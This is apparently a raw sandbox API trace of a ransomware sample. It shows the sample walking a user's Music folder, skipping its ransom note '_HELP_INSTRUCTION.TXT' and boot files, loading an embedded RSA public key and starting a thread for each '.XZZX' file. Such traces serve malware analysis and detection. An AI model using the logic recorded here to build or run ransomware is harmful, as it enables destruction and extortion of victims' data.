lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0243.865] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xff8 [0243.865] Sleep (dwMilliseconds=0x96) [0244.020] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0244.020] lstrcmpW (lpString1="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpString2="..") returned 1 [0244.020] lstrcmpW (lpString1="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpString2=".") returned 1 [0244.021] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0244.021] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="ntldr") returned 0x0 [0244.021] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="NTLDR") returned 0x0 [0244.021] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0244.021] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="ntdetect.com") returned 0x0 [0244.021] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0244.021] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0244.021] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0244.021] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.021] lstrcpyW (in: lpString1=0x17addc, lpString2="3C85A2C827B882D0AC42F6272BD96718.XZZX" | out: lpString1="3C85A2C827B882D0AC42F6272BD96718.XZZX") returned="3C85A2C827B882D0AC42F6272BD96718.XZZX" [0244.021] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xff4 [0244.021] Sleep (dwMilliseconds=0x96) [0244.176] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0244.176] lstrcmpW (lpString1="64527B001382D7BF4D0A170017B7BC07.XZZX", lpString2="..") returned 1 [0244.176] lstrcmpW (lpString1="64527B001382D7BF4D0A170017B7BC07.XZZX", lpString2=".") returned 1 [0244.176] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0244.177] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="ntldr") returned 0x0 [0244.177] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="NTLDR") returned 0x0 [0244.177] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0244.177] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="ntdetect.com") returned 0x0 [0244.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0244.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0244.177] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0244.177] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.177] lstrcpyW (in: lpString1=0x17addc, lpString2="64527B001382D7BF4D0A170017B7BC07.XZZX" | out: lpString1="64527B001382D7BF4D0A170017B7BC07.XZZX") returned="64527B001382D7BF4D0A170017B7BC07.XZZX" [0244.177] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.177] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12f0 [0244.177] Sleep (dwMilliseconds=0x96) [0244.332] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0244.333] lstrcmpW (lpString1="663067DE2A526ACA340DE0352E734F12.XZZX", lpString2="..") returned 1 [0244.333] lstrcmpW (lpString1="663067DE2A526ACA340DE0352E734F12.XZZX", lpString2=".") returned 1 [0244.333] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0244.333] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="ntldr") returned 0x0 [0244.333] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="NTLDR") returned 0x0 [0244.333] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0244.333] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="ntdetect.com") returned 0x0 [0244.333] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0244.333] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0244.333] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0244.333] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.333] lstrcpyW (in: lpString1=0x17addc, lpString2="663067DE2A526ACA340DE0352E734F12.XZZX" | out: lpString1="663067DE2A526ACA340DE0352E734F12.XZZX") returned="663067DE2A526ACA340DE0352E734F12.XZZX" [0244.333] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.333] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12f4 [0244.333] WaitForSingleObject (hHandle=0x12f4, dwMilliseconds=0xffffffff) returned 0x0 [0244.334] Sleep (dwMilliseconds=0x96) [0244.488] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0244.488] lstrcmpW (lpString1="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpString2="..") returned 1 [0244.488] lstrcmpW (lpString1="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpString2=".") returned 1 [0244.488] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0244.489] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="ntldr") returned 0x0 [0244.489] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="NTLDR") returned 0x0 [0244.489] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0244.489] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="ntdetect.com") returned 0x0 [0244.489] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0244.489] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0244.489] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0244.489] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.489] lstrcpyW (in: lpString1=0x17addc, lpString2="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" | out: lpString1="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX") returned="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" [0244.489] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.489] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12f8 [0244.489] Sleep (dwMilliseconds=0x96) [0244.644] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0244.644] lstrcmpW (lpString1="83899D5A26F059DE25E7413F2B253E26.XZZX", lpString2="..") returned 1 [0244.644] lstrcmpW (lpString1="83899D5A26F059DE25E7413F2B253E26.XZZX", lpString2=".") returned 1 [0244.645] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0244.645] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="ntldr") returned 0x0 [0244.645] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="NTLDR") returned 0x0 [0244.645] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0244.645] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="ntdetect.com") returned 0x0 [0244.645] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0244.645] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0244.645] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0244.645] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.645] lstrcpyW (in: lpString1=0x17addc, lpString2="83899D5A26F059DE25E7413F2B253E26.XZZX" | out: lpString1="83899D5A26F059DE25E7413F2B253E26.XZZX") returned="83899D5A26F059DE25E7413F2B253E26.XZZX" [0244.645] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.645] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12fc [0244.645] Sleep (dwMilliseconds=0x96) [0244.800] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0244.800] lstrcmpW (lpString1="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpString2="..") returned 1 [0244.800] lstrcmpW (lpString1="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpString2=".") returned 1 [0244.801] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0244.801] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="ntldr") returned 0x0 [0244.801] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="NTLDR") returned 0x0 [0244.801] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0244.801] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="ntdetect.com") returned 0x0 [0244.801] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0244.801] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0244.801] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0244.801] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.801] lstrcpyW (in: lpString1=0x17addc, lpString2="B7D698FE122EFCA3A766339E164FE0EB.XZZX" | out: lpString1="B7D698FE122EFCA3A766339E164FE0EB.XZZX") returned="B7D698FE122EFCA3A766339E164FE0EB.XZZX" [0244.801] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0244.801] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1300 [0244.801] Sleep (dwMilliseconds=0x96) [0244.956] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0244.957] lstrcmpW (lpString1="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpString2="..") returned 1 [0244.957] lstrcmpW (lpString1="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpString2=".") returned 1 [0244.957] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0244.957] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="ntldr") returned 0x0 [0244.957] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="NTLDR") returned 0x0 [0244.957] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0244.957] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="ntdetect.com") returned 0x0 [0244.957] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0244.957] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0244.957] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0244.957] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0244.957] lstrcpyW (in: lpString1=0x17addc, 